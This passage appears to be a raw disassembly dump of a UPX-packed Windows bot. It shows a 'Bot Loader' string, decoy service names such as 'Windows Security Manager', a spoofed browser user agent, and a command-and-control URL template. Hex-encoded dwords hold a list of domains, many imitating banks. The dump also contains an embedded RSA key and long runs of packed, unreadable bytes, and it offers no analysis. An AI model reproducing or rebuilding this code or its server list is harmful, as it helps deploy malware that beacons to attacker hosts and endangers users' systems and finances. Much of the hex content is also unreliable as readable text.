align 10h
aSystray db 'SysTray',0 ; DATA XREF: sub_310023C8+2B�o
aBotLoader db 'Bot Loader',0 ; DATA XREF: sub_310023C8+24�o
align 4
aSystemRestoreS db 'System Restore Service',0 ; DATA XREF: sub_310023C8+1D�o
align 4
aDiskDefragment db 'Disk Defragmenter',0 ; DATA XREF: sub_310023C8+16�o
align 10h
aWindowsSecurit db 'Windows Security Manager',0 ; DATA XREF: sub_310023C8+F�o
align 4
asc_31004CAC: ; DATA XREF: sub_31002476+56�o
; sub_310026A6+49�o
unicode 0, <\>,0
a1: ; DATA XREF: sub_31002542+B7�o
unicode 0, <1>,0
dword_31004CB4 dd 206h, 2400h, 31415352h, 180h, 10001h, 11838DF5h, 2AEC5279h
; DATA XREF: sub_31002928+B9�o
dd 0E7F63AE4h, 0E0EA9B49h, 0DB21AFBEh, 1A95447Eh, 0A032615Eh
dd 9F6A1F85h, 3994FF94h, 8F26A684h, 5C1DCE35h, 0B20BC9A5h
aZer0_0 db 'zer0',0 ; DATA XREF: sub_31002A44+BF�o
align 10h
aMozilla4_0Co_0 db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
; DATA XREF: sub_31002A44+84�o
align 4
byte_31004D34 db 1 ; DATA XREF: UPX0:31002B45�r
off_31004D35 dd offset dword_31004ED0 ; DATA XREF: UPX0:31002B4D�r
db 1, 0C0h, 4Eh
dd 0B0013100h, 131004Eh, 31004EA0h, 4E8C00h, 4E7C0131h
dd 6C013100h, 31004Eh, 31004E60h, 4E5401h, 4E440131h, 34003100h
dd 131004Eh, 31004E28h, 4E1C01h, 4E100131h, 8013100h, 131004Eh
dd 31004DF8h, 4DE801h, 4DD40131h, 0C4013100h, 131004Dh
dd 31004DBCh, 4DB001h, 4DA40131h, 3100h, 68746566h, 2E647261h
dd 7A6962h, 6B636168h, 2E737265h, 766Ch, 2E767663h, 7572h
dd 2E777777h, 6C646572h, 2E656E69h, 7572h, 69766F6Ch, 646F676Eh
dd 736F682Eh, 6B732E74h, 0
dd 656C6966h, 72616573h, 722E6863h, 75h, 646C6F67h, 61736E65h
dd 722E646Eh, 75h, 6B637566h, 75722Eh, 6F646170h, 2E696B6Eh
dd 67726Fh, 6A6F7274h, 722E6E61h, 75h, 63657361h, 2E616B68h
dd 7572h, 7473616Dh, 782D7265h, 6D6F632Eh, 0
dd 6F6C6F63h, 61622D72h, 722E6B6Eh, 75h, 6B76616Bh, 722E7A61h
dd 75h, 74757263h, 6E2E706Fh, 75h, 6F64696Bh, 61622D73h
dd 722E6B6Eh, 75h, 65726170h, 61622D78h, 722E6B6Eh, 75h
dd 6C756461h, 6D652D74h, 65726970h, 6D6F632Eh, 0
dd 666E6F6Bh, 616B7369h, 726F2E74h, 67h, 69746963h, 6E61622Dh
dd 75722E6Bh, 0
dd 72617778h, 6A632E65h, 656E2E62h, 74h
dword_31004ED0 dd 617A616Dh, 616B6166h, 75722EhaMozilla4_0Comp db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
; DATA XREF: sub_310026A6+13�o
align 10h
aAbcdefghijkl_0 db 'abcdefghijklmnopqrstuvwxyz',0 ; DATA XREF: sub_3100281C+1C�o
align 4
aAbcdefghijklmn db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',0 ; DATA XREF: sub_3100281C+C�o
align 4
aZer0 db 'zer0',0 ; DATA XREF: sub_31002928+B�o
align 10h
aHttpS db 'http://%s',0 ; DATA XREF: sub_31002A44+71�o
align 4
aHttpSIndex_php db 'http://%s/index.php?id=%s?scn=%d?inf=%d?ver=13?cnt=%s',0
; DATA XREF: sub_31002A44+57�o
align 4
dd 9 dup(0)
dword_31004FB8 dd 0 ; sub_31001C18+80�w
dword_31004FBC dd 0 ; sub_31002A44+43�r
dword_31004FC0 dd 0 ; sub_31001ADF:loc_31001B8D�r ...
dword_31004FC4 dd 0 ; UPX0:31001DB0�w ...
dword_31004FC8 dd 0 ; sub_31001E06+33�w
dword_31004FCC dd 0 ; sub_310020F4+20�r
dword_31004FD0 dd 31000000h ; UPX0:31001D95�w
dword_31004FD4 dd 0 ; sub_3100202D+53�o ...
dword_31004FD8 dd 0 ; UPX0:310021A3�w
word_31004FDC dw 0 ; DATA XREF: sub_31001F41+3B�r
; sub_31001FA5:loc_31002006�r ...
align 10h
dword_31004FE0 dd 0 ; sub_31002542+110�w
align 20h
UPX0 ends
; Section 2. (virtual address 00005000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 00005000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX1 segment para public 'CODE' use32
assume cs:UPX1
;org 31005000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_31005000 dd 0C4h, 40h, 74654701h, 61636F4Ch, 6E49656Ch, 416F66h
; DATA XREF: UPX1:31006AD1�o
dd 69725701h, 69466574h, 100656Ch, 74726956h, 466C6175h
dd 656572h, 72695601h, 6C617574h, 6F6C6C41h, 47010063h
dd 6F4D7465h, 656C7564h, 656C6946h, 656D614Eh, 6C010041h
dd 63727473h, 4169706Dh, 65470100h, 73795374h, 446D6574h
dd 63657269h, 79726F74h, 6C010041h, 63727473h, 417461h
dd 706F4301h, 6C694679h, 1004165h, 456E6957h, 636578h
dd 65724301h, 54657461h, 686C6F6Fh, 33706C65h, 616E5332h
dd 6F687370h, 50010074h, 65636F72h, 32337373h, 73726946h
dd 54010074h, 696D7265h, 6574616Eh, 636F7250h, 737365h
dd 6F725001h, 73736563h, 654E3233h, 1007478h, 7274736Ch
dd 41797063h, 736C0100h, 656C7274h, 100416Eh, 65656C53h
dd 6C010070h, 63727473h, 416E7970h, 65470100h, 72754374h
dd 746E6572h, 636F7250h, 737365h, 74654701h, 636F7250h
dd 72646441h, 737365h, 616F4C01h, 62694C64h, 79726172h
dd 57010041h, 65746972h, 636F7250h, 4D737365h, 726F6D65h
dd 43010079h, 65736F6Ch, 646E6148h, 100656Ch, 6E65704Fh
dd 636F7250h, 737365h, 74654701h, 75646F4Dh, 6148656Ch
dd 656C646Eh, 47010041h, 69547465h, 6F436B63h, 746E75h
dd 65724301h, 4D657461h, 78657475h, 43010041h, 74616572h
dd 72685465h, 646165h, 65724301h, 50657461h, 65636F72h
dd 417373h, 74655301h, 6E657645h, 4F010074h, 456E6570h
dd 746E6576h, 45010041h, 54746978h, 61657268h, 52010064h
dd 46646165h, 656C69h, 74654701h, 656C6946h, 657A6953h
dd 72430100h, 65746165h, 656C6946h, 45010041h, 50746978h
dd 65636F72h, 1007373h, 4C746547h, 45747361h, 726F7272h
dd 65440100h, 6574656Ch, 656C6946h, 57010041h, 46746961h
dd 6953726Fh, 656C676Eh, 656A624Fh, 1007463h, 61657243h
dd 76456574h, 41746E65h, 6E490100h, 6C726574h, 656B636Fh
dd 636E4964h, 656D6572h, 746Eh, 0D1h, 0
dd 67655201h, 61657243h, 654B6574h, 41784579h, 65520100h
dd 74655367h, 756C6156h, 41784565h, 65520100h, 65755167h
dd 61567972h, 4565756Ch, 1004178h, 4F676552h, 4B6E6570h
dd 78457965h, 52010041h, 65446765h, 6574656Ch, 756C6156h
dd 1004165h, 43676552h, 65736F6Ch, 79654Bh, 6F624101h
dd 79537472h, 6D657473h, 74756853h, 6E776F64h, 43010041h
dd 74707972h, 61657243h, 61486574h, 1006873h, 70797243h
dd 73614874h, 74614468h, 43010061h, 74707972h, 69726556h
dd 69537966h, 74616E67h, 41657275h, 72430100h, 44747079h
dd 72747365h, 6148796Fh, 1006873h, 70797243h, 73654474h
dd 796F7274h, 79654Bh, 79724301h, 65527470h, 7361656Ch
dd 6E6F4365h, 74786574h, 72430100h, 41747079h, 69757163h
dd 6F436572h, 7865746Eh, 1004174h, 70797243h, 706D4974h
dd 4B74726Fh, 7965h, 0DEh, 0E8h, 6D656D01h, 706D63h, 72747301h
dd 726863h, 78655F01h, 74706563h, 6E61685Fh, 72656C64h
dd 73010033h, 74737274h, 72010072h, 646E61h, 61727301h
dd 100646Eh, 636D656Dh, 1007970h, 6C727473h, 1006E65h
dd 736D656Dh, 7465h, 0E9h, 110h, 6E694601h, 6E695764h
dd 41776F64h, 65470100h, 726F4674h, 6F726765h, 57646E75h
dd 6F646E69h, 47010077h, 69577465h, 776F646Eh, 65726854h
dd 72506461h, 7365636Fh, 644973h, 70737701h, 746E6972h
dd 4166h, 0F4h, 124h, 746E4901h, 656E7265h, 61655274h
dd 6C694664h, 49010065h, 7265746Eh, 4F74656Eh, 556E6570h
dd 416C72h, 746E4901h, 656E7265h, 65704F74h, 100416Eh
dd 65746E49h, 74656E72h, 736F6C43h, 6E614865h, 656C64h
dd 746E4901h, 656E7265h, 74654774h, 6E6E6F43h, 65746365h
dd 61745364h, 6574h, 100h, 13Ch, 0FF0073FFh, 0DFF0002h
dd 1FF00h, 0FF0039FFh, 34FF006Fh, 17FF00h, 0FF000CFFh
dd 4FF0009h, 13FF00h, 0FF0010FFh, 3FF0016h, 0
dd 45500000h, 14C0000h, 87140002h, 40D0h, 0
dd 0E00000h, 10B010Fh, 24000006h, 10000000h, 0
dd 1D880000h, 10000000h, 40000000h, 0
dd 10003100h, 2000000h, 40000h, 0
dd 40000h, 0
dd 50000000h, 4000000h, 0
dd 20000h, 0
dd 10000010h, 0
dd 10000010h, 0
dd 100000h, 2 dup(0)
dd 2BF00000h, 8C0000h, 14h dup(0)
dd 10000000h, 17C0000h, 6 dup(0)
dd 742E0000h, 747865h, 23060000h, 10000000h, 24000000h
dd 4000000h, 3 dup(0)
dd 200000h, 642EE004h, 617461h, 0FE40000h, 40000000h, 10000000h
dd 28000000h, 3 dup(0)
dd 400000h, 4000C000h, 2DF80000h, 44B60000h, 274D0000h
dd 0F2150DB6h, 0E113C4EBh, 0B2793772h, 68158743h, 68030B84h
dd 166DAC80h, 2D2F8A6Bh, 0F4624753h, 4553EB31h, 9A17BC76h
dd 8B3E3423h, 3038C8C2h, 0E1FB5701h, 58E73ED9h, 3604D0C9h
dd 294BA468h, 0A95D0DEEh, 6806D1DBh, 1D89805Bh, 44B09FBCh
dd 122776DBh, 0B314DF60h, 0B05DF2C7h, 5614DDADh, 27B5353h
dd 80113A01h, 0D1FC735h, 0F029C804h, 1A40FE83h, 9A51B3ECh
dd 0C4C02274h, 4C46C0A3h, 16FDE978h, 0F1A3597Ch, 5153FC97h
dd 674B6249h, 0C03A796Bh, 0E126565Bh, 0EC3370FBh, 0C2580C5Eh
dd 499AF810h, 0B35E69A8h, 0E80C3E56h, 5E93BFB7h, 0EC5D89h
dd 0FF25FF05h, 0C33A041Fh, 0DD837FA1h, 7443CCA3h, 0CC8A12E7h
dd 0DF74C984h, 0A3645E50h, 42EA26F4h, 154098F5h, 58C2DD32h
dd 6E440C64h, 0F4D7D1FDh, 0D807F85Fh, 6891481Fh, 38501ADFh
dd 0AF0867FBh, 0E2EB5959h, 455FCF53h, 97305987h, 70019043h
dd 0EB36D0A1h, 0B0333C5Eh, 23E11D6h, 0F4C1E60Ah, 802DD6D9h
dd 304526A0h, 0A3541B63h, 7CD4E0D0h, 603B19B0h, 1AC4A36Eh
dd 0D9B73DD0h, 52C13B3Dh, 729CC45h, 0C41304C5h, 0BEC71C95h
dd 6683E15h, 4D08131Eh, 0FD8D26A5h, 0B5FAEDAh, 6999020Eh
dd 0D844C835h, 5834F0BBh, 6A26402Ch, 7F1180A1h, 0B2EAFF7Ah
dd 0A1642BD0h, 8964508Ah, 0B36C0725h, 68C3C772h, 388F9758h
dd 0AD816CDCh, 843A3D7h, 674BA8FCh, 7F603203h, 4C7AB0Ah
dd 400B4824h, 9A40643Ch, 38860927h, 40643D34h, 592C3006h
dd 0F07CC339h, 3974080Bh, 2C4B2468h, 60F7C590h, 4B1CB632h
dd 0DEE1406h, 498485DBh, 0D0A280Ch, 0E49CBB58h, 1C187676h
dd 400A9515h, 3521502Bh, 0C382267Ch, 14EDEE28h, 0D0FA43E3h
dd 888618DDh, 0E3EB2A13h, 81618683h, 3DFF61B2h, 0F0BA3C0Fh
dd 48204615h, 0E4270D67h, 47C2A80h, 2E7FA4D8h, 0B458A51h
dd 0B0E1E92Dh, 32FFEB97h, 43A52DBh, 1CEFC895h, 3831BA5Fh
dd 8825BA5Dh, 13FA0B5Dh, 0B70F5E02h, 0DD19FECFh, 59A4DC35h
dd 0FEF7999Dh, 7352D603h, 0B2EDC3FEh, 0FB80FC65h, 5EBD72FFh
dd 5F766248h, 49ACEC99h, 6833F092h, 15B0D758h, 81084F0Eh
dd 5DD40D0Ah, 36D99863h, 0E0530B09h, 92D90E75h, 0F75B771h
dd 1F41680Ch, 0E93D89BAh, 32DADE41h, 0D703FF84h, 0B1FB8143h
dd 50DBE4C6h, 875F9F17h, 9A030C5Dh, 737BB166h, 6FB3A2E8h
dd 1DEF025Bh, 0FD73812Fh, 2DE6BD04h, 77FEFF9Eh, 0F7887F3Ch
dd 62DB0E9Eh, 3B3123A3h, 3EAADC74h, 0C59D93B0h, 9E57A0A3h
dd 0C89C572Fh, 57112CF6h, 0A51359F8h, 712B712Fh, 75B33CFFh
dd 106873EEh, 64761E27h, 0BED3A60Dh, 70849ED3h, 60CB2C2h
dd 4EDEA9AEh, 60E5AC60h, 508F5099h, 316D7A70h, 8078BA5Ah
dd 0CF6F81DAh, 0BCCBB3Ch, 6068B003h, 35EABC4Bh, 111001B9h
dd 266C40B5h, 8AC077D3h, 0DF0B80C6h, 0B3BC2CC7h, 5655C2C0h
dd 0D4125793h, 63C343E6h, 0A5519402h, 0EC181F0Ch, 0F4FD30E0h
dd 0E25314E3h, 3776CD5Bh, 6A020BF6h, 5DD83850h, 0E87105BAh
dd 96D27FB5h, 9187400h, 0E13B8211h, 510AE60h, 4F001419h
dd 7E1006D8h, 0F010B0A2h, 0D743EAAh, 0C420D553h, 51C73B62h
dd 0DB399210h, 4C3C37D0h, 0ED3A1824h, 117EED85h, 2C202D26h
dd 0EDB0EEDh, 96EF144Dh, 0F2EBA205h, 8324B716h, 0EB65750Dh
dd 4C0B7BDDh, 3F680E94h, 11179C0Dh, 0C06460Bh, 2C382A15h
dd 106EB3BEh, 51B01408h, 17470B65h, 7D5618B7h, 0B8C618B8h
dd 3EF6B1B0h, 0DC743D56h, 676E962Ah, 18FC7516h, 10205014h
dd 3C6B1718h, 6A030859h, 5A550F1Dh, 8BE2CED7h, 4D5662C6h
dd 182C562Eh, 53CEC990h, 27005556h, 2C5ACE59h, 0C520AA6h
dd 9262CF04h, 305D0C03h, 83EA0128h, 0DE5320C3h, 0EDE24EAFh
dd 0F1B5E0Fh, 3CC2948Eh, 4E365C1Eh, 17ADF779h, 6785F07Ch
dd 0C1A4AEE4h, 7ADE2592h, 0D8DB3568h, 0ECEC5F49h, 5C71082h
dd 0C0865020h, 1BEEF134h, 8D477DDEh, 0FC1D1E74h, 0F178BFEFh
dd 745278DEh, 0E0B5FF1Ch, 0F20B9B45h, 0FFFC646h, 7008521Fh
dd 33361C35h, 76D84650h, 39E17BBDh, 38B78973h, 57D00F56h
dd 239103C7h, 4C9076B7h, 7CD4062Ch, 723964D8h, 58DCC8E4h
dd 44E450E0h, 47942CE8h, 20EC1C8Eh, 0F4F404F0h, 69A2794Bh
dd 0A7DB032h, 16BEEBBFh, 80C4C2C7h, 0B7188B05h, 0C8A34497h
dd 75F92EC8h, 0B06C107Dh, 1D2B0E17h, 9A2C0C90h, 8337354Ch
dd 5F75B61Dh, 519C0761h, 74E4781Bh, 0EE98AD09h, 0D3D41887h
dd 0E5636A88h, 9C09FE58h, 0A184435Dh, 3E0831Bh, 8705C083h
dd 0D109D365h, 5CD00952h, 86EEC2Ch, 8C1059B9h, 4CAC683Dh
dd 0E661C30Ah, 140E26DCh, 0CEF1E138h, 6160D982h, 0CC20401Ch
dd 0C8662CB7h, 30B9C6C6h, 0ACC59Bh, 125D4160h, 64146CFAh
dd 73F01F4h, 20E7B7CCh, 0E8795E34h, 7CF45700h, 9F60C1FFh
dd 501FC52Bh, 0BFB14C7h, 25D376E0h, 0E02D52E0h, 0BF501D6Ah
dd 207A71CCh, 51F0E10Ch, 0FE37743Fh, 0AB907B94h, 1FB4BB0Ah
dd 52D103B0h, 0B61D8B53h, 53EEF4C5h, 383D53BCh, 37EE6BC6h
dd 590FEBB1h, 0D82532CEh, 78C8D9B2h, 65E28818h, 1C6F7596h
dd 0B068BB26h, 46E8184Ch, 0CDC2372Eh, 14FEB9BBh, 915EEB72h
dd 12C166A7h, 3310AB4Ch, 31B1BC24h, 0FD3BBBC6h, 90462D2Ch
dd 7E0AE2Dh, 2D8D5948h, 15EB0CE4h, 9AF55960h, 93806472h
dd 0EC0CD7CBh, 331EA783h, 7668CA4Ch, 0C674136Ah, 48115B38h
dd 7BE010DDh, 57EFD4C9h, 0DC68CAE5h, 1B2CEC4Eh, 0BC7EA41Dh
dd 0C0DE3BD8h, 0F0A86317h, 248CF1ECh, 2C3D8B4Bh, 9D9E3017h
dd 0DD72211h, 710E066Ah, 8D7BC676h, 5C0F0584h, 0D1591C59h
dd 598375ACh, 3026DD7h, 62B30114h, 0A740C5F2h, 0F00C3AD9h
dd 0C8152080h, 1E289053h, 3BB5D827h, 0E7511C6h, 0A8C544A3h
dd 517D03BBh, 57E800BFh, 780D1FDDh, 4859B0B4h, 9924FB53h
dd 119F1DB1h, 0F8A756F4h, 2D443353h, 3C92C1BDh, 8A9C05AAh
dd 5C938153h, 0EB9040F1h, 0C6D08B49h, 8702C77h, 7C04E78Bh
dd 40FFCF83h, 7FF0086Ah, 171FFE3h, 8A59F92Bh, 0FF588A10h
dd 0C1D90239h, 0E28004FAh, 0DD542A03h, 0F62FEDFEh, 0A02E3C0h
dd 8AA588D3h, 188A0150h, 221ACAFEh, 6D6EEFD1h, 35716E9h
dd 0F0E32319h, 4646161Ch, 30EE08Dh, 833714FEh, 0BF7C30FAh
dd 0ED593817h, 27BC4FB7h, 122CBE59h, 0F30AE47Dh, 0A4A566A5h
dd 816FF40Fh, 25C81091h, 0DB85100Ch, 2D237DA4h, 0C3A2BE95h
dd 0D3BE0F1Ah, 0E438EC9Ch, 804D5AA5h, 0C8AF2357h, 6FF1BFB6h
dd 0C12B1A38h, 99C30359h, 15448AD0h, 1F23EBE4h, 0E427C2C8h
dd 0EBC8C840h, 83418A03h, 2AAC301Ah, 6EA50786h, 57107E37h
dd 0BA84008Ah, 53618B4Ch, 46A1422Ch, 8A136E05h, 4FBEB1D8h
dd 6041FD0Bh, 18180C08h, 47590788h, 0F6DF6138h, 7C59EDEDh
dd 7F7A050Bh, 83F38C06h, 410A61EEh, 0FED75A0Fh, 4D4120DCh
dd 5BBB7548h, 382A4B64h, 418045A8h, 0FF0B4EA5h, 8B0AB617h
dd 0B60F040Eh, 0C2031114h, 3F98341h, 8E1633F0h, 0C28B3004h
dd 25816122h, 3C994D70h, 0EDFA480Ah, 942301EDh, 0FCF4C001h
dd 0D968D6C9h, 0E90DFF80h, 0D008C183h, 0E0D038F1h, 50285D83h
dd 6CCDE257h, 780D03Ch, 22A6A780h, 0E3BB9BE6h, 0F2261E8h
dd 1E0BBA88h, 0B18D0F1Ah, 0EEBE59ABh, 317E6A47h, 0F6F04DECh
dd 0E982569Bh, 1E8AF760h
dd 5B268065h, 0B2F34C4h, 9DEABEA5h, 8DC4408Ah, 0FA6F0246h
dd 1E88DFB9h, 0FBC1711h, 0BA041908h, 5B014638h, 0F1CB6811h
dd 446A6175h, 1E4C1456h, 0CE15DD98h, 282D8C01h, 4D50306Ah
dd 0C161B98Dh, 2A2F0DFFh, 2753D8F7h, 7DD0124Ch, 330F1B10h
dd 0A27823F5h, 0DB24F159h, 0E042D059h, 5901E805h, 14F00885h
dd 8512C200h, 3B443D18h, 9117076Ah, 566B140h, 3438C6EBh
dd 1A0C3274h, 599B32Ch, 0D405BC72h, 0DA12D7C6h, 4F5CA0D1h
dd 4AC08E79h, 13185CCDh, 0DD19BA2Dh, 0CF736B0h, 4D5F0053h
dd 38D0D0Eh, 8DBF864Eh, 50515326h, 204A9264h, 0BEFB6575h
dd 51A22000h, 0AC750C14h, 4EB40B8h, 0F8227F3Bh, 0D5B1354Ch
dd 4BD26E05h, 7C4E4352h, 0BD3E8D48h, 0DF0309A1h, 7924196Ch
dd 0BA0F8773h, 3230D68Dh, 0F6D64C59h, 8C5725FBh, 348F9ED6h
dd 34B6848Ah, 5269914Dh, 0B6B4FD8Fh, 1A4B4D35h, 0FBD65940h
dd 808A11FCh, 33C54EC4h, 93E0B9D2h, 2FFA9070h, 81F1F708h
dd 61B48C2h, 0FE836800h, 2FF73646h, 0B6EBBA0Eh, 825FFCCh
dd 40561h, 6E09E9BDh, 0EA51CCCCh, 1472E58Dh, 7A5BE981h
dd 2D0BF7ECh, 17018504h, 812BEC73h, 6ECF0CC4h, 0E18B7A5Bh
dd 0CA40768Bh, 10F043C3h, 2322A5E8h, 6C740563h, 8501502Bh
dd 4F7Dh, 0B00A8A3Fh, 6858EB01h, 0CDFFEC74h, 3A7074FFh
dd 32312F2Fh, 31302E37h, 3030383Ah, 652E652Fh, 0DF6578h
dd 8FFEDFFFh, 697A6F4Dh, 2F616C6Ch, 5DDF2734h, 0B966C933h
dd 758D01EEh, 0FFFD8B05h, 8AFEFB6Dh, 7993C06h, 302C0646h
dd 88993446h, 0EDE24707h, 0DAE80AEBh, 2FFDFFBh, 65622E82h
dd 93712E67h, 1201C999h, 0FD91BDFDh, 0BFDD0716h, 72C17FFFh
dd 0FD42AA68h, 10FDAA66h, 0A91C14BAh, 0F3C91A98h, 8608F198h
dd 6EC7FECFh, 10C07102h, 37CB5F90h, 1C965992h, 0E4143A78h
dd 0EC3E4FB6h, 0A7D7157h, 0F345713Ah, 8904F19Dh, 0FBEE748Fh
dd 9C04F109h, 67B34011h, 0B7BFE3F3h, 10F0F63Bh, 0B20BDC1Ch
dd 0C99B6059h, 14D90125h, 0D8F63E59h, 0CA17A104h, 8D2B9E71h
dd 0AD916168h, 1FD9F6B7h, 9666611Ah, 0B228111Dh, 9900C850h
dd 0F6EFDC14h, 5557B6CFh, 0A44E1225h, 491291C0h, 54F7ED99h
dd 6FF67EEEh, 3AC41400h, 3B71CBCAh, 0E424FF1Ch, 0CDCF1A21h
dd 0D9B64FCDh, 2C668FC3h, 0FB1E3F81h, 0DB37CEB0h, 0C383B8FDh
dd 0A85D12CDh, 251DCBC9h, 3FB264ADh, 5A0B24D9h, 0C096A648h
dd 0D9FB1B14h, 294CFF65h, 9CF3EBA7h, 3416E9BAh, 0F57126F4h
dd 0ECFFFBBBh, 3BF90EFCh, 4629EF13h, 0DE5F376Bh, 0A8EC4766h
dd 0F7B016AAh, 0B70137FFh, 0E9EDFFC5h, 0B7FDE9ECh, 12CE1FCh
dd 87DDFEDFh, 0FCFCF5CAh, 0EBFCF25Ah, 0AAF5FCF7h, 34C7D6ABh
dd 0FFB3AAF9h, 0B459FFF2h, 662A2A25h, 9093ACC9h, 9D90B781h
dd 0CDC98363h, 10309271h, 0BFF85F76h, 14513519h, 720A95D9h
dd 0C8712A91h, 0FFFDBFEBh, 12A5D27Fh, 9AE180D5h, 146FAA52h
dd 0C89A2A8Dh, 9A8B12B9h, 5958474Ah, 0DB9BAB9Eh, 0DBEDFFFFh
dd 0EC20A319h, 0BDDDA26Ch, 0DF9EED85h, 0EB81E8A2h, 0C8125544h
dd 0B0961FBDh, 2EFFFCD0h, 0D812EB8Dh, 125A9A85h, 5A9A099Dh
dd 0D096F810h, 9FFBB6F6h, 7F664922h, 8712FEFDh, 95C25AA9h
dd 82128502h, 0B5483F04h, 0CB5A91EDh, 85C7CFF7h, 424D53FFh
dd 9F90BC8Fh, 0C8531872h, 62FEFFh, 0FFF1AD02h, 204350FFh
dd 5754454Eh, 204B524Fh, 474F5250h, 204D4152h, 0FB17CD31h
dd 4CF6B1FFh, 24D4E41h, 6E69570Ah, 73776F64h, 726F6620h
dd 0D6035720h, 6B7F6D2Dh, 756F7267h, 1A330E70h, 234D2761h
dd 0E96C3E5Eh, 32215832h, 312E3232h, 7920544Eh, 18DA6B06h
dd 8B323C20h, 44BB73A4h, 0BA07192Bh, 23FF0Ch, 7D8363h
dd 140A1104h, 1FD40520h, 0D6ED6F5h, 4B4C0069h, 27505353h
dd 0CA76FF97h, 0E00882EAh, 24005792h, 64006Eh, 0B777006Fh
dd 0DCDB17h, 30743A73h, 398C0901h, 25B73000h, 1D2335B2h
dd 0C800072Eh, 0DA1B2273h, 0DA2008ABh, 0C9324CDh, 1039F57h
dd 758360C8h, 47234601h, 73FF4007h, 60F23h, 1F011006h
dd 0E0888A15h, 0E8B70048h, 4FE5FFh, 6A198144h, 49E4F27Ah
dd 30AF281Ch, 215367B3h, 0E16044DFh, 6B75DF5Ch, 304F2DAEh
dd 75C0400h, 8D085ABDh, 5CAF75DCh, 72E4D61h, 2E380036h
dd 8DDB7BAFh, 491B3077h, 43EC00h, 3F3B24h, 61CF201Fh, 8A26463h
dd 0E41E04DCh, 16402DBFh, 0DEDE00FFh, 16000E00h, 3702019Fh
dd 26C24261h, 0DE192840h, 3EFB868h, 0D96C8B11h, 70D374h
dd 0BE429663h, 6B9C2ACBh, 81DD9F25h, 0E10DB3Dh, 541B0448h
dd 0DCFB5413h, 265A75D6h, 5C225963h, 6545CBC7h, 9FF3483Dh
dd 0B000587h, 0B8481003h, 0FFFEB810h, 0B0EEC5Fh, 19286A05h
dd 0D0B10C39h, 0A89B11h, 2ED94FC0h, 0FE17D9F5h, 885D5FC7h
dd 0C91CEB8Ah, 3CE89F11h, 6048102Bh, 22E7C9D1h, 0A3F40C7Bh
dd 30CA060h, 0A05E43C8h, 0CB10Ch, 2393BFEFh, 40880CA0h
dd 0EC000900h, 47B00703h, 95009278h, 7C4F4014h, 0C8BF4070h
dd 6C8A5Eh, 9E134307h, 788FFC27h, 0AB001385h, 13E9A65Bh
dd 8D2FF810h, 0FF409CF1h, 40230EFEh, 41830C1Dh, 88840816h
dd 27DD3E4Fh, 0EE10B943h, 10B801FFh, 661F200Ch, 0DAD2793h
dd 0D80F7F07h, 215E59F2h, 84700118h, 90F9000Fh, 950F8457h
dd 0E4D8000Fh, 7F026FC9h, 0F6C0F84h, 4AADEC00h, 6FA89A78h
dd 93FC1343h, 691F88C0h, 2050586Eh, 6DB37250h, 4600AC0Ah
dd 93390144h, 32C844FCh, 15123C6Bh, 0B2410275h, 53C840D7h
dd 1941C00h, 21CAFFF9h, 5CC606EBh, 5C73255Ch, 24637069h
dd 0BFFF97F9h, 1CEC8166h, 0E4FF07h, 65446553h, 69677562h
dd 656C6976h, 266D6567h, 6441FFFBh, 7473756Ah, 656B6F54h
dd 4C73176Eh, 27F76F6Fh, 707512B9h, 756C6156h, 4F174165h
dd 0FFE02870h, 636FDB62h, 43347324h, 61766461h, 68336970h
dd 0E3C7F88Bh, 72657475h, 5B33316Dh, 0C4AEF665h, 545F11DFh
dd 57796172h, 72431735h, 0ED1A6165h, 52FB773Bh, 56F6D65h
dd 140C6854h, 74726956h, 5BB55875h, 2841B5BBh, 0F78454Fh
dd 356E724Eh, 9E97D1A2h, 1EF3F547h, 50545448h, 4BF7BF7Fh
dd 32203C5Ch, 4B4F2057h, 4B010A0Dh, 0FF666E6Fh, 2446B76h
dd 67044C2Dh, 203A6874h, 5A187525h, 2FCA587Bh, 0B5795428h
dd 6DBD1D26h, 6C70A3DFh, 69856369h, 2D782F15h, 28F42DC7h
dd 6F63FBB6h, 0C972706Dh, 0DB576465h, 7FCADBDDh, 544547FCh
dd 64FE6600h, 6573D311h, 952BFDA1h, 6376736Dh, 0F177D3B1h
dd 16DA2DDh, 320B0865h, 0EB75175Fh, 0DE336696h, 39303103h
dd 9013380Fh, 0D1173E41h, 17303107h, 33645482h, 253AA45Dh
dd 0B59FFF2Fh, 53678D64h, 5754464Fh, 5C455241h, 736F694Dh
dd 583F756Fh, 735C836Ch, 7275435Ch, 0C356C972h, 88B770E2h
dd 525CBE73h, 0FE907875h, 55B430DFh, 64135BA8h, 68736166h
dd 73647A6Eh, 0DAC26C64h, 4953426Eh, 573F6177h, 5B7050AEh
dd 4BF96C0Eh, 25865712h, 49236C4Ch, 3120B16Dh, 0FB43DDDEh
dd 20676966h, 76D7A576h, 326576F8h, 736C979Dh, 532063CFh
dd 1B654410h, 165B991Ah, 172387B2h, 1F858D12h, 737983BFh
dd 0FF42000Ch, 2DC65B20h, 23FD0AD6h, 206D1B13h, 0AC07A14h
dd 374E06B5h, 7B736944h, 3251B6EEh, 672F66AAh, 632A9C6Dh
dd 25B0BFDAh
dd 690A6324h, 4D207974h, 0A71E6E61h, 1AC56317h, 70483185h
dd 1DF8B3FFh, 415352F0h, 78018031h, 11838DF5h, 2AEC5279h
dd 56FFFFFFh, 49E7F61Ch, 0BEE0EA9Bh, 7EDB21AFh, 5E1A9544h
dd 85A03261h, 949F6A1Fh, 0FFFF68B1h, 843994FFh, 358F26A6h
dd 0A55C1DCEh, 7AB20BC9h, 8F1D2252h, 20D25603h, 62372728h
dd 0B6FDAD6h, 53773B31h, 36204549h, 0E8920915h, 0E41A1A36h
dd 6F297435h, 77CF76D0h, 0C0017A83h, 0EA0B004h, 9E798C00h
dd 6C7C79E7h, 0E7445460h, 34E7BE79h, 101C0428h, 3CF3CF08h
dd 0E84DF8CDh, 0B0BCC4D4h, 3CC986C2h, 6883D7A4h, 0F6D37AD6h
dd 6962A48Dh, 6308007Ah, 6C2E733Eh, 9AD68D76h, 766343DFh
dd 77722E76h, 2ADB0700h, 6C8E6294h, 5F660FACh, 5B6370AFh
